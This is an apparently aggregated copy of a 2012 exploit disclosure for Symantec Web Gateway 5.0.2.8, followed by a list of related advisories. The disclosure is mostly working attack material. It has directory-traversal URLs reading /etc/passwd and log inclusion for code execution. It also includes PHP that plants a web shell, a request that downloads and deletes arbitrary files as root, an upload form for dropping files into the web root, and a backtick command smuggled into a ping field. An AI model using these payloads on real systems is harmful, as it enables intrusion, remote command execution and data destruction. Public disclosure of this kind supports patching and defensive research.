Lucene search
S2 CrewPACKETSTORM:114231HistoryJun 27, 2012 - 12:00 a.m.
Symantec Web Gateway 5.0.28 LFI / Code Execution
2012-06-2700:00:00
S2 Crew
packetstormsecurity.com
31
0.974 High
EPSS
Percentile
99.9%
`Software: Symantec Web Gateway
Current Software Version: 5.0.2.8
Product homepage: www.symantec.com
Author: S2 Crew [Hungary]
CVE: CVE-2012-0297, CVE-2012-0298, ???
File include:
https://192.168.82.207/spywall/previewProxyError.php?err=../../../../../../../../etc/passwd
File include and OS command execution:
http://192.168.82.207/spywall/releasenotes.php?relfile=../../../../../../etc/passwd
You can execute OS commands just include the error_log:
/usr/local/apache2/logs/
-rw-r--r-- 1 root root 5925 Nov 15 07:25 access_log
-rw-r--r-- 1 root root 3460 Nov 15 07:21 error_log
Make a connection to port 80:
<?php
$f = fopen('/var/www/html/spywall/cleaner/cmd.php','w');
$cmd = "<?php system(\$_GET['cmd']); ?>";
fputs($f,$cmd);
fclose($f);
print "Shell creation done<br>";
?>
Arbitary file download and delete:
https://192.168.82.207/spywall/download_file.php?d=/tmp/addroutelog&name=addroutelog
d parameter: the complete filename
After the download process application removes the original file with root access! :)
Command execution methods:
1.Method
Download and delete the /var/www/html/ciu/.htaccess file.
After it you can access the ciu interface on web.
There is an upload script: /ciu/uploadFile.php
User can control the filename and the upload location:
$_FILES['uploadFile'];
$_POST['uploadLocation'];
2.Method
<form action="https://192.168.82.192/ciu/remoteRepairs.php" method="POST" enctype="multipart/form-data">
<input type="file" name="uploadFile">
<input type="text" name="action" value="upload">
<input type="text" name="uploadLocation" value="/var/www/html/spywall/cleaner/">
<input type="hidden" name="configuration" value="test">
<input type="submit" value="upload!">
</form>
The "/var/www/html/spywall/cleaner" is writeable by www-data.
Command execution after authentication:
http://192.168.82.207/spywall/adminConfig.php (this is deprecated config file, it should be remove)
From the modified POST message:
Content-Disposition: form-data; name="pingaddress"
127.0.0.1`whoami>/tmp/1234.txt`
`
Related
exploitpack
exploitpack
symantec Web gateway 5.0.2.8 - Multiple Vulnerabilities
2012-06-27 00:00:00
seebug
seebug
symantec web gateway 5.0.2.8 - Multiple Vulnerabilities
2014-07-01 00:00:00
exploitdb
exploitdb
symantec Web gateway 5.0.2.8 - Multiple Vulnerabilities
2012-06-27 00:00:00
nessus
nessus
symantec
symantec
Symantec Web Gateway Multiple Security Issues
2012-05-17 08:00:00
prion
prion
Design/Logic Flaw
2012-05-21 20:55:00
Code injection
2012-05-21 20:55:00
checkpoint_advisories
checkpoint_advisories
packetstorm
packetstorm
Symantec Web Gateway 5.0.2.8 Command Execution
2012-05-28 00:00:00
Symantec Web Gateway 5.0.2 Local File Inclusion
2012-05-26 00:00:00
Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection
2012-06-11 00:00:00
saint
saint
Symantec Web Gateway access_log PHP Injection
2012-06-11 00:00:00
Symantec Web Gateway access_log PHP Injection
2012-06-11 00:00:00
Symantec Web Gateway access_log PHP Injection
2012-06-11 00:00:00
cve
cve
CVE-2012-0298
2012-05-21 20:55:00
CVE-2012-0297
2012-05-21 20:55:00
openvas
openvas
Symantec Web Gateway 'relfile' Parameter Directory Traversal Vulnerability
2012-05-18 00:00:00
Symantec Web Gateway Remote Shell Command Execution Vulnerability
2012-06-01 00:00:00
dsquare
dsquare
Symantec Web Gateway 5.0.2 LFI
2012-06-09 00:00:00
Symantec Web Gateway 5.0.2 RCE
2012-06-09 00:00:00
securityvulns
securityvulns
ZDI-12-090 : Symantec Web Gateway Shell Command Injection Remote Code Execution Vulnerability
2012-06-13 00:00:00
Symantec WebGateway security vulnerabilities
2012-06-13 00:00:00
zdi
zdi
d2
d2
DSquare Exploit Pack: D2SEC_SYMWEBGW
2012-05-21 20:55:00
attackerkb
attackerkb
CVE-2012-0297 Symantec Web Gateway Vulnerability
2012-05-21 00:00:00